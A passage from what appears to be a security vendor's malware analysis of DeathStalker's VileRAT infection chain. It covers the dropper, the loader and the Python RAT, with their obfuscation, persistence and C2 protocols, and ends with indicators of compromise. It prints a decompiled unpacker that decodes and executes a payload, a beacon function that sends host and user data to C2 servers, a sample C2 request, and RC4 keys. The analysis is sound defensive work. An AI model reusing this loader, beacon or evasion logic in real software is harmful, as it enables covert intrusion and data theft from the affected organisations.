  • decodes and drops VileLoader and its encoded companion shellcode. The file names and location will vary depending on samples, but they are placed under a seemingly legitimate common folder in “%APPDATA%” (e.g., “exe” and “dev0Y11ZF.tmp” in “%APPDATA%\Microsoft\Printer Settings\Printers\”);
  • schedules a task to run VileLoader 35 to 65 seconds later, then indefinitely every three hours and 45 minutes.

VileDropper sends data to a C2 server using an HTTP GET request to a fixed URL (e.g., “hxxp://hubflash[.]co/admin/auth.php”), using a preset User-Agent (both the C2 URL and the User-Agent change depending on VileDropper samples). The useful information is stored as a JSON document, which is then XOR-encoded, base64-encoded, URL-encoded, and set as a cookie value in the HTTP request:

JSON Key Content (JSON value) u A target identifier. The identifier is a custom UUID-like representation of the target’s login (%USERNAME% environment variable) and computer UUID (as obtained in the first result of the WMI query: SELECT UUID FROM Win32_ComputerSystemProduct). This UUID-like value is then base64-encoded and URL-encoded. Due to fixed lengths and padding from the identifier generation logic, the identifier’s final form is always 48 characters long. d A hard-coded VileDropper identifier, which might designate a campaign or version (e.g., “9745B355”). a A list of the names of the security products (AntiVirusProduct in WMI) that are installed on the target computer, separated by the pipe sign (|), then XORed, base64-encoded and URL-encoded. n The target’s fully qualified login, as the shell expansion of “%USERDOMAIN%\%USERNAME%”, which is then XORed, base64-encoded and URL-encoded. w The target’s operating system version, as returned from the WMI query SELECT Version FROM Win32_OperatingSystem, then base64-encoded and URL-encoded.

The task that is scheduled by VileDropper (whose name varies depending on samples, e.g., “CDS Sync” or “UpdateModel Task”), triggers the following type of execution command:

%APPDATA%\Microsoft\Printer Settings\Printers\FWDeviceEnabler.exe "[u]" "<encoded companion shellcode file name>" "[a]" "[w]" 0 "[d]" "[n]" <a letter of the encoded companion shellcode file name>

The characters between square brackets (such as [u]) in the command line designate the content of the corresponding JSON key (i.e., [u] is the encoded target identifier).

A XORing interlude

Before moving on to VileLoader, a note on the XOR encoding scheme that is leveraged by VileDropper to protect data sent to the C2 server, as similar schemes will be used further on. The algorithm generates data blobs that are laid out as follows (then sometimes further base64-encoded and URL-encoded):

Type A:

[XOR key (6 random bytes)][XOR-encoded data]

The resulting blobs are self-sufficient and can be decoded by the recipient (as well as any third party…) without any access to the pre-shared key. In VileDropper, strings that are encoded as part of the JavaScript obfuscation benefit from an additional XORing step: the XOR key that is embedded in data blobs is additionally XORed with a script-specific fixed password (a part of this fixed password is passed to VileDropper on its execution command line by the previous DOTM macro in the infection chain, the other part is hard-coded in VileDropper itself).

Later, VileLoader and VileRAT use other variants of this algorithm, which produces data blobs that are laid out as one of the following options:

Type B:

[XOR key length (variable)][XOR key (random bytes)][Padding][XOR-encoded data]

Type C:

[XOR-encoded data length][XOR-encoded data][XOR key length (variable)][XOR key (random bytes)]

Type D:

[XOR key length (variable)][XOR key (random bytes)][XOR-encoded data length][XOR-encoded data]

VileLoader: an evasive multi-stage implant downloader

VileLoader is a remarkable piece of the VileRAT compromise approach. While it has existed since Q2 2020 (it was first publicly documented as dddp.exe), it has been continuously updated and maintained since, and is still deployed from VileDropper at the time of writing. VileLoader’s main goal is to download and execute an additional payload from a C2 server. Though we have only observed it triggering the execution of VileRAT, the loader can technically download and execute other implants.

Recent VileLoader samples are composed of a binary executable (stage 1) and an encoded companion shellcode file (stage 2). Previous samples of VileLoader usually embedded the shellcode within the binary executable directly, and presented themselves as a single monolithic file.

Stage 1 – Doctored binary unpacker

VileLoader is initially presented as a binary executable, which ensures the first stage of the execution. This binary is always a legitimate one, which is meticulously doctored by the attackers to integrate a malicious unpacker-type payload. As such, the binary may appear legitimate from a quick automated static code analysis perspective: it includes all the code of a legitimate application (but will not work as expected). This “unpacker” stage is aimed at decoding, loading, and executing the second stage in memory.

VileLoader’s workflow starts by waiting 17 seconds. Then it parses the command line arguments. The command line must include five arguments at least, or VileLoader terminates the execution. In practice, VileDropper usually gives seven arguments to VileLoader, as we have previously described. VileLoader then opens its encoded companion shellcode file (whose name is passed as a second argument to VileLoader, e.g., “devENX1C6SS.tmp”), reads and decodes it (using the Type B XOR algorithm), maps the deobfuscated data in a region with read, write and execute (RWX) permissions, and runs the next stage (stage 2) by starting a new thread.

VileLoader’s first stage contains very unique “signature” techniques that have been stable since the first sample we analyzed in Q2 2020:

  • “Sleep” and “GetTickCount” Windows API functions are leveraged to generate random waiting delays. Those functions are resolved in an unusual way: by referencing hard-coded offsets from the beginning of the current binary image that point directly to entries in the legitimate executable’s import address table (IAT);
  • the unpacking and loading of VileLoader’s encoded companion shellcode file leverages multiple custom-made system calls, that are similar to low-level Windows API functions (NTDLL) for different Windows versions: NtOpenFile, NtReadFile, NtAllocateVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject (see Figure 12).

    Figure 12. VileLoader’s stage 1 custom-made system call

However, while older samples parsed command line arguments by resolving and calling dedicated Windows API functions (such as “GetCommandLineW”), the recent samples directly read this information from their own PEB (Process Environment Block) structure. This may have been done to better bypass the detection of some security solutions.

Stage 2 – In-memory downloader

The second stage content is extracted from VileLoader’s encoded companion shellcode file, and run by VileLoader’s first stage in-memory, in a new thread. From a data perspective, the second stage shellcode (once unpacked by the first stage) is a PE binary that is stripped of its headers and embeds additional encoded data.

This second stage starts by decoding the required data from its own content (using the Type C XOR algorithm). Some data are decoded as hash values that were generated with the djb2 algorithm. Those hashes are in turn used to resolve the required function imports through a homebrew IAT: required libraries are loaded, their export tables are parsed, exported function names are hashed with djb2, and the hashes are compared to hashes that were decoded from internal data. Stage 2 continues by creating a mutex, whose name has been stable since Q2 2020, and which is the same as in VileRAT (“Global\wU3aqu1t2y8uN”).

Finally, VileLoader’s second stage builds an HTTP GET request that is used to download an implant package. In older VileLoader samples, the downloader used a static URL that looked as follows:

http://<domain>/c&v=2&u=<argument 1>&a=<argument 2>&c=<argument 3>

The only evasion attempt consisted in randomly choosing an HTTP User-Agent header value amongst a fixed list of four. VileLoader used the targeted system’s uptime as a source of “randomness”. In recent samples, developers tried to improve these evasion techniques, and the HTTP request now looks like this:

GET /administrator/index.php HTTP/1.1 Connection: keep-Alive Accept-Language: en-US,en;q=0.8 Accept: */* Referer: http://www.yahoo.com Cookie: source=<encrypted blob>; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Host: corstand[.]com

All values that are colored in red are now chosen at random from a hard-coded list that is decoded from the stage 2 content (using the Type C XOR algorithm). The encrypted blob (cookie value) is initially a JSON dictionary, encrypted with the RC4 algorithm (using the key “BD DE 96 D2 9C 68 EE 06 49 64 D1 E5 8A 86 05 12 B0 9A 50 00 4E F2 E4 92 5C 76 AB FC 90 23 DF C6”, decoded from stage 2 content), XORed (using the Type B XOR algorithm), base64-encoded and URL-encoded. The actual JSON content is very similar to the one that is sent by VileDropper to the C2 server:

JSON Key Provided by VileDropper  via the command line Value v Hard-coded value (65 in the last sample we analyzed) which might be a version number. u ✔️ The target identifier. a ✔️ The list of security solutions installed on the targeted computer. w ✔️ The target’s operating system version. d ✔️ A fixed identifier, which might designate a campaign or version. n ✔️ The target’s fully qualified login (%USERDOMAIN%\%USERNAME%). r Flag that indicates if the mutex creation succeeded (1) or failed (0). xn Current process name (e.g., SerenadeDACplApp.exe). s Constant value embedded in the code and equal to 0.

The C2 server then answers in the HTTP response body, with one of the following instructions:

  • do nothing: the answer is four null bytes;
  • implant package: the answer is an encoded implant package to parse (see later);
  • send a screenshot: the answer is a byte of value “1”, followed by three null bytes.

In older variants, VileLoader’s second stage did not embed the screenshot capability, which was, however, implemented in VileRAT.

If the C2 server answers with an implant package, it sends a Type D XORed blob. The resulting data is further decompressed using the LZMA1 algorithm, and contains one or several “files” with the following additional metadata:

  • A CSIDL value, representing the root folder in which the file must be dropped (resolved with the “SHGetFolderPathW” Windows API function);
  • A subdirectory name;
  • A file name;
  • A task name if the file execution is to be scheduled;
  • The command-line arguments if the file is to be executed.

If a specific flag is set in the C2 server response data, VileLoader creates a Windows scheduled task for the last dropped file to set up its persistence. The task is created using the ITaskService interface. Finally, the last dropped file is also immediately executed using the “CreateProcessW” Windows API function. It should be noted that some older VileLoader samples executed the downloaded payload in memory, while recent variants tend to drop the downloaded implant on the target’s filesystem.

If the C2 server requests a screenshot, then VileLoader stage 2 sends an HTTP POST request with a cookie whose value is a XORed (Type B algorithm) JSON dictionary containing the following fields:

JSON Key Value u Target identifier. sc Constant value (1). dt Screenshot timestamp (in the format “YYYY-MM-DD HH:MM:SS”).

The associated HTTP POST body data is an encoded (using the Type B XOR algorithm) JPEG screenshot.

VileRAT – A super-packed yet still overweight Python implant

VileRAT is the last known stage of the intricate eponym infection chain from DeathStalker. It is an obfuscated and packed Python3 RAT, bundled as a standalone binary with py2exe. We first discovered it in Q2 2020, and it has also subsequently been named PyVil by other vendors.

A note on VileRAT’s seniority

The Python library (DLL) that is embedded in a py2exe-bundled binary usually comes from an official Python release. While analyzing VileRAT samples, we noticed that its Python DLL is a custom compilation of Python 3.7 sources: the DLL version is tagged as “heads/3.7-dirty”[1] (instead of “tags/v3.7.4” for an official release, for instance) and references a shortened Git commit ID of “0af9bef61a”. This shortened commit ID matches one in the source code repository of the 3.7 branch of the standard CPython implementation, which is dated to 2020-05-23. Due to this commit date and considering the fact that we first discovered VileRAT in Q2 2020, we believe with medium to high confidence that VileRAT was first packaged for deployment in June 2020.

Unpacking VileRAT

When we first encountered VileRAT, we noticed that all usual decompiling tools for Python3 (uncompyle6, decompyle3 and unpyc37, to name just a few) failed to correctly retrieve a Python source from the VileRAT bytecode. Some of our industry peers had the same issue when they encountered it as PyVil.

Long story short: the first stage of VileRAT has been obfuscated at the Python bytecode-level, with the intention of breaking existing decompilers (see Figure 13). The bytecode is obfuscated by:

  • adding multiple operations that do not have any effect when executed (neutral operations) and useless data;
  • adding confusing branching and exceptions handlers;
  • inserting invalid bytecode in sections that will never be reached during execution (but that decompilers still try – and fail – to decompile).

Figure 13. VileRAT’s first stage Python bytecode, in its original form (left) and deobfuscated form (right). The only useful instructions of this excerpt are highlighted in red.

Once cleaned at bytecode-level, the first stage of VileRAT unpacking can be properly decompiled as Python code:

import sys import zlib import base64 T8 = base64.b64decode y6 = zlib.decompress m5 = T8(b'<a 7-million+ characters long base64 string>') k9 = bytearray(m5) Y7 = bytearray(b'0sMIsDYmkeST5ZJHOfHkwmrA5JGVmpBbpKeA') N2 = bytearray(len(k9)*bytes([0])) j = 0 code_length = int(len(k9)/5) for i in range(code_length): if i % 3 == 0: N2[i] = k9[i] ^ Y7[j] N2[i] = k9[i] if j + 1 == len(Y7): j = 0 j += 1 N2[i:] = k9[i:] exec(y6(N2))

VileRAT embeds no less than three layers of unpacking. The efforts that have been put into making a Python script (VileRAT) hard to analyze from a human perspective is a DeathStalker signature by itself, considering they also tried the same for all the other steps in the infection chain, and that it is part of their usual approach.

The last unpacking step finally extracts the VileRAT Python code and a whole bundle of its dependencies in memory – all this content causes py2exe-bundled VileRAT samples to weigh around 12MB. The unpacking leverages decoding (using the Type B XOR algorithm) and BZIP2 decompression. The final VileRAT Python package notably contains a conf.pyc module which includes a version number, as well as default C2 domain names:

VERSION = 7.2 SVC_NAME = 'AJRouter' server_urls = ['hxxp://pngdoma[.]com', 'hxxp://robmkg[.]com', 'hxxp://textmaticz[.]com', 'hxxp://goalrom[.]com'] user_agent_list = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36']

VileRAT versions and functionalities

We analyzed and compared various VileRAT samples, containing version numbers ranging from 2.4 to 8. VileRAT functionalities have not changed much over time, and some functionalities from the earliest sample we analyzed have actually been dropped (such as leveraging SSH as a C2 channel, or screenshotting, the latter now being implemented in VileLoader instead). The remaining functionalities include:

  • Arbitrary remote command execution, using an existing or downloaded binary;
  • Establishing SSH connections to remote servers, possibly leveraging them to forward ports of the targeted computer to the remote server;
  • Keylogging;
  • Setting up persistence using scheduled tasks;
  • Listing security solutions that are installed on the target computer;
  • Self-updating from a C2 server.

VileRAT has five distinct and exclusive execution modes, enabled from the command line, which can all be further altered with additional command switches, parameters and/or data from the C2:

Command line option Internal name(s) Execution mode description -a enc_cmd_data

RUN_CMD_AS_USER_ARG Arbitrary command execution

The “command” term is quite large: it can either be an existing binary, a shell command, a downloaded executable, a Python package, or an internal VileRAT function. In order to specify the “command”, a JSON dictionary[2] is passed as an optional parameter. Some commands will be executed by starting VileRAT again, using a distinct set of command options. VileRAT exits after this execution. -l enc_cmd_data_rss

RUN_R_SSH_SHELL_ARG SSH connection test

VileRAT starts a new process of itself, which connects to a remote SSH server (using a private key), then… closes the connection. This SSH connection used to serve as a C2 channel in previous samples, but the C2 logic has been removed in recent samples. In order to specify the SSH connection settings, a JSON dictionary is passed as an optional parameter. VileRAT exits after this execution. -r enc_cmd_data_rds

RUN_R_DYN_SSH_ARG SSH-tunneled local port forward

VileRAT starts a new process of itself, which connects to a remote SSH server (using a password). This connection is leveraged as a tunnel to forward ports from the target computer to the remote server. In order to specify the SSH connection settings, a JSON dictionary is passed as an optional parameter. VileRAT quits once the remote end has connected to the forwarded port at least once, and subsequently closed the connection. -c cp_exe_path Arbitrary file deletion

VileRAT attempts to delete a file, whose path is given as a clear text command parameter. VileRAT quits when the file is deleted or when the maximum number of attempts (10) is reached. -t rts

IS_TASK_SCHED_ARG Main C2 client mode

This is the main execution mode for VileRAT. It regularly polls a C2 server for commands to execute. The commands that can be executed are one of those described in this table (RUN_R_SSH_SHELL_ARG, RUN_CMD_AS_USER_ARG, RUN_R_DYN_SSH_ARG), or one of the additional VileRAT internal update commands. CMD_UPDATE_SVC triggers a (partial or complete) VileRAT update from a C2-downloaded package, while CMD_UPDATE_CONF can update internal delays and enable a keylogger if the C2 requires so.

In a typical first execution for VileRAT, as we identified in 2022, the implant is started with the following arguments:

ImagesInfo.exe "[u]" -x -m "EDP CredsTask" -i

Note than in this case, the target identifier that is passed as the first argument is not actually exploited by VileRAT, and may just be used by the attacker to easily identify running VileRAT processes later. Older VileRAT variants were usually launched with explicit “-f” and “-t” command line switches: those are now implicit and enabled by default.

Here is the list of some notable VileRAT changes we spotted as the versions evolved, apart from regular updates to fix code bugs or handle uncaught exceptions, refactor code, update dependencies, and change configuration:

  • Between versions 2.4 and 2.7, VileRAT dropped the capability to use a remote SSH server as a C2 channel, as well as the screenshot implementation;
  • In version 3.0, the base64-encoded RC4 key which is used for various encryption routines changed from “Ixada4bxU3G0AgjcX+s0AYndBs4wiviTVIAwDiiEPPA=” to “XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=”, and an additional XOR pass (of Type B) was added in encoding schemes. The VileRAT remote update mechanism was refactored, and an additional command switch (called pmode) was added;
  • In version 3.7, specific Chrome version and Trezor wallet reconnaissance functions that we initially identified for version 2.4 were removed from the code, and VileRAT lost the ability to update from files provided on the filesystem where it was running;
  • In version 5.4, the way UUID-type identifiers were generated changed;
  • In version 6.5, an additional command switch (called jmode) was added;
  • In version 6.6, “-f” and “-t” command options were enabled by default.
VileRAT HTTP C2 protocol

VileRAT’s main C2 communication loop, as executed during Main C2 client mode (as described in VileRAT functionalities above), is quite straightforward and runs in a separate thread:

  • Every 2-5 minutes, VileRAT tries to send an HTTP POST request to each of the C2 servers that exist in its configuration, until one replies or until the list is exhausted. Environment data is embedded in a JSON dictionary, which is encrypted using RC4, encoded using the Type B XOR algorithm, base64-encoded and URL-encoded, then finally set as the HTTP request URL path (see Figure 14);
  • A C2 server may reply with an HTTP response, whose body can include an encoded and encrypted JSON array. If so, the JSON must contain at least a command to execute.
def get_request_data(req_type, xmode, pmode): data = { 'type': 'svc', 'xmode': xmode, 'pmode': pmode, 'req_type': req_type, 'svc_ver': conf.VERSION, 'svc_name': conf.SVC_NAME, 'ext_uuid': get_ext_uuid(), 'svc_uuid': get_service_uuid(), 'old_svc_uuid': get_old_service_uuid(), 'host': get_hostname(), 'uname': get_username(), 'ia': win32.hap(), 'wv': win32.gwv(), 'dt': datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S'), 'xn': os.path.basename(sys.executable) } if req_type == REQ_GET_CMD: data['gc'] = global_conf data['klr'] = keylogger.kl_run data['cr'] = win32.is_process_exist(exe_name='chrome.exe') data['avs'] = get_av_list() elif req_type in [REQ_FIRST_RUN, REQ_INSTALL_DONE]: data['avs'] = get_av_list() enc_data = quote(b64encode(encrypt_xor(rc4_encrypt(json.dumps(data).encode('utf-8')))), safe="~()*!.'") return enc_data

Figure 14. VileRAT C2 request preparation function

Just as in VileLoader, the User-Agent value in HTTP requests is randomly selected from a fixed list of possible values. The JSON that is passed to the C2 server can be broken down as follows:

JSON Key Value type Fixed value set to “svc”. xmode True if VileRAT is executed with the xmode command line switch; false otherwise. pmode True if VileRAT is executed with the pmode command line switch; false otherwise. req_type Internal C2 command request type, value can be get_cmd, update_done, screenshot, first_run, install_done or klgr. svc_ver Internal VileRAT version number as set in VileRAT’s configuration. svc_name Internal VileRAT implant name as set in VileRAT’s configuration. ext_uuid Partial value of one of the mutexes VileRAT sets to ensure atomic execution. It can either be the same system UUID as the one collected by VileDropper as part of the target identifier generation, or a hard-coded one. svc_uuid The target identifier, generated again with the same algorithm used in VileDropper. old_svc_uuid A hard-coded value, or the same system UUID as the one collected by VileDropper as part of the target identifier generation, but represented using a different (and presumably older) custom algorithm. host Hostname of the target machine. uname Username of the target. ia 1 if the user running VileRAT has administrator privileges; 0 otherwise. wv Windows version, formatted as dwMajorVersion.dwMinorVersion (eg. 10.0). dt Timestamp of the HTTP request, formatted as YYYY-MM-DD HH-MM-SS. xn VileRAT’s filename. avs JSON list of installed security products names (e.g., [“windows defender”, “kaspersky internet security”]), as retrieved from WMI by VileRAT.

The C2 answer is expected as an encoded and encrypted JSON list (leveraging the same coding and cryptographic methods as for the JSON in the HTTP request). Each item in the list must be a JSON dictionary that contains at least a “cmd” key. Its value can be one of: update_svc, ssh_rshell, r_cmd, ssh_rdyn or update_conf. Additional JSON key/value pairs can exist in the dictionary and are passed to internal commands as parameters.

A few words about VileRAT’s infrastructure

We looked for specificities in the C2 domains we could retrieve from the samples gathered (either malicious DOCX files, DOTM files and their macros, VileDropper, VileLoader or VileRAT) and that are described in this report. We ignored domains registered before mid-October 2021 because most of them were already disclosed in public sources (all known malicious domains and IPs are listed in full in the indicators of compromise section below). It should be noted that to date, we have identified hundreds of domains associated with VileRAT’s infection chain.

This allowed us to identify some likely VileRAT-specific infrastructure creation preferences:

  • Starting from October 2021 at the latest, DeathStalker infrastructure IPs all belong to AS42159 (DELTAHOST UA, located in NL). According to our telemetry, DeathStalker likely started to leverage servers with IP addresses from this AS (along with others) as early as June 2021;
  • Malicious domain names are often batch-registered (several domains on the same day) at NAMECHEAP, Porkbun LLC or PDR Ltd.;
  • A lot of malicious domain names try to masquerade as seemingly legitimate digital services providers names (such as “azcloudazure[.]com” or “amzbooks[.]org”), and some denote a possible attempt to leverage events of worldwide interest to conduct attack campaigns (such as “weareukrainepeople[.]com” or “covidsrc[.]com”);
  • Domain usage seems to be separated most of the time (one domain is used only for either infection DOCX/DOTM, VileLoader or VileRAT), and might indicate a desire by the threat actor to tightly cluster its operations. But all those domains usually point to a very limited set of IP addresses;
  • A quick analysis of the characteristics of the services exposed on C2 IPs during malicious activities allowed us to note common signatures: the HTTP service sends a combination of content and header values that could only be retrieved for such malicious infrastructure.
VileRAT’s targets

From August 2021 to the present day, using only data that we could check with our own telemetry, we identified 10 compromised or targeted organizations in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the United Arab Emirates and the Russian Federation (see Figure 15).

Figure 15. Map of organizations targeted by DeathStalker’s VileRAT campaign (darker color indicates a higher concentration)

We could not profile all the identified organizations, but half of them were foreign currency (FOREX) and cryptocurrency exchange brokers. Some identified malicious documents and infrastructure domains contain (parts of) the targeted organizations’ names, and confirm this targeting.

It should be noted that the identified organizations range from recent startups to established industry leaders, including dubious cryptocurrency exchange platforms. Locating such organizations is extremely difficult from the limited data we have at hand, because a small FOREX company might, for instance, host its infrastructure in various foreign countries, employ several remote workers from different countries, and be legally based in a tax haven.

Attribution

When we first discovered VileRAT in June 2020, we initially attributed the implant and associated infection chain to DeathStalker. This first attribution was mainly based on similarities with previously known EVILNUM campaigns (common specific metadata in LNK files, similar TTPs – notably the spear-phishing approach leveraging Google Drive files and fake personas, consistent victimology). The tie between EVILNUM campaigns and DeathStalker has already been demonstrated in our previous article.

We still believe with high confidence that the described updated implants and associated infection chain are developed and operated by DeathStalker:

  • The main implants (VileLoader, VileRAT) that are leveraged for this campaign are updates of previously analyzed ones, and still share a large majority of code and implementation specifics with previous samples;
  • The various components of the described infection chain (DOCX, macro-enabled DOTM, VileDropper) share implementation logic and techniques that have previously been leveraged by DeathStalker as part of other campaigns (PowerSing and PowerPepper notably):
    • Using malicious documents (fetched from emails) as an infection vector;
    • Signaling infection progress and errors to remote servers;
    • Using a similarly implemented XOR algorithm for string obfuscation (in DOTM macros, and in previously documented PowerPepper loaders);
    • Leveraging Office object properties as hidden data sources;
    • Using similarly implemented hash-like functions with a preset constant (to generate a target identifier in VileDropper, to decode an IP address in PowerSing).
Conclusion

VileRAT, its loader and associated infection chain were continuously and frequently updated for more than two years, and are still leveraged to persistently target foreign currency and cryptocurrency exchange brokers, with a clear intent to escape detection.

Escaping detection has always been a goal for DeathStalker, for as long as we’ve tracked the threat actor. But the VileRAT campaign took this desire to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from this actor. From state-of-the-art obfuscation with VBA and JS, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader, and security vendor-specific heuristic bypasses, nothing has been left to chance.

Considering the vast and quickly changing associated infrastructure as well, there is no doubt DeathStalker is making a tremendous effort to develop and maintain accesses. Yet, there are some glitches and inconsistencies: a final payload weighing more than 10MB (VileRAT), simple infection vectors, lots of suspicious communication patterns, noisy and easily identified process executions or file deployments, as well as sketchy development practices leaving bugs and requiring frequent implant updates. As a result, an efficient and properly setup endpoint protection solution will still be able to detect and block most of VileRAT’s related malicious activities.

Putting these facts into perspective, we believe DeathStalker’s tactics and practices are nonetheless sufficient (and have proven to be) to act on soft targets who may not be experienced enough to withstand such a level of determination, who may not have made security one of their organization’s top priorities, or who frequently interact with third parties that did not do so. We still, however, cannot determine what DeathStalker’s principal intention against such targets is: it could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding its customers in working around sanctions and/or spying on the targets’ customers, but it still does not appear to be direct financial gain.

Indicators of compromise Infection DOCX MD5 hashes

09FB41E909A0BCA1AB4E08CB15180E7C
0B4F0EAD0482582F7A98362DBF18C219
0CB7936975F74EA2C4FA476A6E3D5A05
15C62D22495CA5AA4BB996B2CB5FEB7F
1AAFBE60E4D00A3BFFDB76FA43C2ADBB
237831757F629BA61C202B51E0026C9B
238CD8435ADFFDAEBBF9D7489764648A
241AD2BB7E703343F477960B39A8B300
257754E9CD6EEC6DB5323E282FB16A74
2BAADB95EF832CF5EB550121FA0292D0
2C6314821C64F235E862B38DADEE535E
2F8817B75D81C2F029FA70DE69B4A94B
3C4F409A7926731254B44CA6526DCED1
3C9A5A69CC928A39519178DA2A8EFFB6
5BE87EC5A2F48483317A57CE120ACC0E
609F595053D481C047D9C9B8C0F6B39C
63090A9D67CE9534126CFA70716D735F
77612466654702C7ED7C6B1C21CFAEFE
77B4AF2734782DC7FC10A6FD7978AE80
79157A3117B8D64571F60FE62C19BF17
7C7D4DFAC6A2628B9921405F25188FE3
8746077795FF9C33A591C7E261B7C7B8
9352DBA6CC8AC67F22E62D7A1B5E51B6
9895D0C19AC482F62C53AD8399F98B66
A4B79DA85C6EE26D0EBEA444A60DB900
A7FB4779F2A1C4A27DA2E74616DB7C31
B09A35B75700D11A251BDFC51B1D08E9
C212AF0C8A880697374E06B59376F991
C59EB65B0B237E39AFED796C5B3DB417
C75FC659F257291C9CCC94C3FF4B5A83
C818E4BCA286C690156EFF37DAA2E209
C86F8642560A6353ED2FE44F0C6B07E8
D72B649DF88D78441D5629AF99FA1D40
E0D474AF77E89BF1C2DBB7D7A5F8ACE9
E28F2F0546EF07BC3425528D813EC954
E375B63A76DADDFF5741B340AE7BD6A8
E51CBCF89A26686C62350BAE371F8601
E726520B3AD875B516DF6C3D25476444
F0D3CFF26B419AFF4ACFEDE637F6D3A2
FB75DDE8F9E473D019A6CBDBB0D2283A
FF2558571EE99ED4AEC63A3980719034

Macro-enabled DOTM remote templates MD5 hashes

02C1EC61C4E740AF85B818A89E77E2C2
75A3F8D143CF96C163106E21272FF170
7FCC03D062AC8AA2BE8D7600B68FC53A
82D841D7712AB0EE9F1BBB6B3D22821A
93CE42F23B0800F257D355C0B10C8D79
E6F9D538FCDF46493DF8ECB648F98D13

VileDropper JavaScript MD5 hashes

3C8052862B194F205AC5138BF07ADFBE
43A2B45D25BB898DBBCB2EE36C909D64
6E201A9BB9945BDC816A7A9C2DCF73B9
7822FF3D5008E0B870BB03EF8D2032DC
99F762D23451B9ABABA95BCE3F544FDB
C97B0753A263E042EB6E3C72B2F6565F
CABAF29E9763D18B0D0DFFBC576FDF3E

VileLoader (stage 1 binary) MD5 hashes

0456FA74B8CC6866C5D1CE9E15136723
0BD06D2C17987C7B0C167F99BB4DC0B4
0F3685A6ACA7991C209D41D0E2279861
107A084A1C8A6E9E5B3BEF826C3443DC
15A192BB683BD47956CC91B2CFCE3052
161FE654DDED7AE74EE40F1854B9F81E
174CF10F0F320B281B3FFBF782771AD7
22DDB087EF3310B3F724544F74E28966
237BAB121E846DCFA492E7CC5966EAD9
2503B8AABEEB2649915126573307B648
29EF001568851845B84F3CD163BFD439
2A5ECA9B83A999E86054E53330F68F5B
2DBEA08AFE245F246B500727B7D27761
2FC7211C94B7C89968ACFAD8C084EE3B
2FDDDA0DC33D3F8BAB906C43982AA4A2
30CA78A99F49782942835B1C10E2834A
33F1303842BDDC98205984E6ACF782F7
344A41ECF89B5642B6FE0A695852AA1B
36E60C00A64BAA014CF7A44CB9C9F410
3C960DCC782A4D9552F0CC96451633C8
3D127901AFD64EACE4C7B939FDBA90BB
3E0A49646B9D5D0C63036692BA1C7315
3FC5AB8A3EAB1D8CFF8530BBE2BAE608
524909CB66848B1EE2987FDC0B69B451
52B208E86C0DDE252200953A4EB71EA3
52C1E4537424E151469E8E67DF07EFE6
577497F9E9D4EA6070AA250B355DCFB1
578E16856061F6CB760B06B1735F9143
5BA950833DC55FE30F1E24CBCF1DEA3C
5D9DB5350E1CA2D9DACBA75F4AA80AE0
6677B435A7455579BC063BD9F7CBE65E
6A1672401FFD7FB64DFE09A7A464067C
6AED3D8D53CB4B90FF0EDA8803C7F1F5
6E056456B2F40D2C47219C6DB24D9541
700B71690C7902DEC10275A6AE320ADF
77AC6332A5A4DE5712B66949AC8BF582
7B478EDC2B74D7ECDC6B1D9532C9E7F8
80A84624126B6D72FF5D1B25B80204C2
82118066CF5EE34E7956F8D288B725E6
85C09C35F85EDD1428208CD240A72BD8
8B4905B5D0142EBD67B103E2CDD047E3
8C377D184D88991388B7D0ED6CFB4A98
8C4975EDB8C6BE37C416D9B6483E9BD5
942D540F7608752233800AEB66BC8DC7
977D5BABF7112F1B6072EAA1F3F896B8
991CA8ECD3F4A70892CFF4FB774AF22B
A82C6772F984A9B49A1512B913DA4332
AB4B8D26D389C76B3D4A85E2CCB9E153
B68915810F6DE276A706E7F4C37645EA
B6EE9DAEA4B2D849793E651603A1512D
BC162B6742AA1EA86A3B391D549EF969
C21025561A3151F9EB2C728AAB5A7A90
C3828CE2ED1453EFAAD442D150B79F6E
C89D5BB8A36C0F2891B5A75834A7AD64
CF8988662588C8FE943ECF42FC35E0B4
D3E95C81D038CBF6EFC5AF3208313922
DB1A697955F1140AED36864617F41425
DB2179161FA0FC1694BD7425D1E80A5D
DB6800CF6288BA0B7492F533F519CA24
DC6F128A5316FB9AF66EA01190C63895
E18078DCA1A1F452B06EC0D9C30982B6
E3F106AF3E45C480BF9E45EB21617083
E833910AB506B08DB2A0E7E1313C6556
EA71FCC615025214B2893610CFAB19E9
F02B13F9634604BE5388B3C13C7CEC8D
F18D216B070744097846F96877865D1C
F5884141B04503EE6AFB2A17FD7761FC
F93FEE328737CB97D83701A4A50EAEFD
FC5F0CC23280547E1D727534649B3DFA
FFE01DCCC1AA70C80EBB1B9F8FCADF1F

VileRAT (standalone) MD5 hashes

348C99A209616FC674FCABCAFDDBA4A0
99B54991FCE2C6D17CDEF7BBD60FDA27
B0353610172416A9FFCD3E7FB7BAE648
EC04E0D3EADF043A1219942051A2A147
BB2113989478DB0AE1DFBF6450079252
15BAF177FC6230CE2FCB483B052EB539
BAB0B5BB50C349CEFD9DEDF869EB0013
D3947C239A07090DEB7D4A9D21D68813
B4183E52FB807689140ED5AA20808700
A7B300D6CB0488358A80C512A64FF570
8F20155F0D9541F7CB5C3BBDC402498B
6D0B710057C82E7CCD59A125599C8753
14D9D03CBB892BBBF9939EE8FFFDD2B5
A62850FD3D7DEC757043AB33417E7A13
03205E90135FD84D74AF8B38D1960994
ACCC6633AF50AEA83024AB5A0861375B
E1956B827EF36A0DDE5C42F2C26AC8B6
DBD9CBAEB27326EF2AEAD32292D70632
8F9D01DC7D1EB9AB388BF94F0B926E3B
